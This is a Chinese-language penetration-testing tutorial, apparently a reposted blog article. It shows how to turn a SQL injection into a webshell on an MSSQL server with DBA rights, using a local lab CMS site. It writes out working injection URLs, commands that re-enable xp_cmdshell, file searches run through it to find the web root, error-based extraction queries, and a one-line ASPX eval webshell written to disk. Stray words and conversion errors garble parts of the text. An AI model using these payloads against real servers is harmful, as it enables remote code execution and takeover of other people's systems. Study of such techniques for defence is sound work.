MSSQL DBA权限获取WEBSHELL的过程

时间 2020-09-26

标签 mssql dba 权限获取 webshell 过程栏目 SQL 繁體版

原文原文链接

前言

本文主要经过一个案例来演示一下当MSSQL是DBA权限，且不知道路径的时候如何去获取WEBSHELL。固然这种方式对站库分离的无效。
我测试的环境是在Win7 64位下，数据库是SQLServer 2000，IIS版本是7.5，程序是采用风讯的CMS。后台登陆后有多处注入，由于这里是演示用注入获取WEBSHELL，所以就不考虑后台上传的状况了，只是用注入来实现。html

过程

首先找到一个以下的注入点：web

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1' and 1=user;--

经过SQLMAP能够查看到是DBA权限sql

建立临时表shell

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';CREATE TABLE tt_tmp (tmp1 varchar(8000));--

在WINDOWS下查找文件用以下命令：
数据库

for /r 目录名:\ %i in (匹配模式) do @echo %i

例如在C盘下搜索NewsList.aspx，可使用for /r c:\ %i in (Newslist*.aspx) do @echo %i或者for /r c:\ %i in (Newslist.aspx*) do @echo %i安全

使用for /r c:\ %i in (Newslist*.aspx) do @echo %i的搜索结果
测试

必定要在匹配模式里面加上一个*号，否则搜索出来的是所有的目录，后面拼接了你搜索的内容。
使用for /r c:\ %i in (Newslist.aspx) do @echo %i的搜索结果spa

用xp_cmdshell执行查找文件的命令，并将搜索的结果插入到临时表中.net

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';insert into tt_tmp(tmp1) exec master..xp_cmdshell 'for /r c:\ %i in (Newslist*.aspx) do @echo %i ';--

若是没法执行xp_cmdshell，并提示以下错误SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。由于此组件已做为此服务嚣安全配置的一部分而被关闭。系统管理员能够经过使用sp_configure启用‘xp_cmdshell’。命令行

可使用以下命令来启用xp_cmdshell

;EXEC sp_configure 'show advanced options',1;//容许修改高级参数
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; //打开xp_cmdshell扩展
RECONFIGURE;--

而后再次执行搜索命令。

在执行上述搜索和插入过程后，可使用' and (select(*) from tt_tmp)>1页面返回是否正常来判断是否有搜索结果。当没有找到的话，select(*) from tt_tmp的结果为1，不然大于1。若是没有的话，就换目录，能够试试其余盘符，如';insert into tt_tmp(tmp1) exec master..xp_cmdshell 'for /r d:\ %i in (Newslist*.aspx) do @echo %i ';--。也可使用sqlmap来查看条数。

能够用报错将表内容给显示出来

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=2' and 1=(select top 1 tmp1 from tt_tmp)and 'a'='a

继续爆

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=2' and 1=(select top 1 tmp1 from tt_tmp where tmp1 not in ('c:\inetpub\wwwroot\manage\news\NewsList.aspx '))and 'a'='a

也能够用sqlmap直接将表中数据读取出来

而后根据导出结果的路径来判断是否可能为WEB目录。而后写入一个测试文件，看是否能够访问来进一步证明结果。

这里在根目录写了一个txt文件，写别的目录怕由于没有权限而没法访问。

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';exec master..xp_cmdshell 'echo test >c:\\WWW\\2333.txt';--

而后访问http://192.168.232.138:81/2333.txt

成功访问，而后就是写一句话

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\233.aspx' ;--

DOS命令将文件写入文本中时，遇到<>应在前面加上^。成功写入。而后就是进一步的操做了，这里就不概述了。

总结:

这里一共有三个小的知识点:
1.sa用户如何开启xp_cmdshell

EXEC sp_configure 'show advanced options',1;//容许修改高级参数
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; //打开xp_cmdshell扩展
RECONFIGURE;

2.Windows下利用dos如何搜索文件

for /r c:\ %i in (Newslist*.aspx) do @echo %i
for /r c:\ %i in (Newslist.aspx*) do @echo %i

3.dos命令下写文件遇到<>如何处理

echo ^<^> > 123.txt

参考:

[1]Windows命令行(cmd)下快速查找文件(相似Linux下find命令)
[2]技术分享：MSSQL注入xp_cmdshell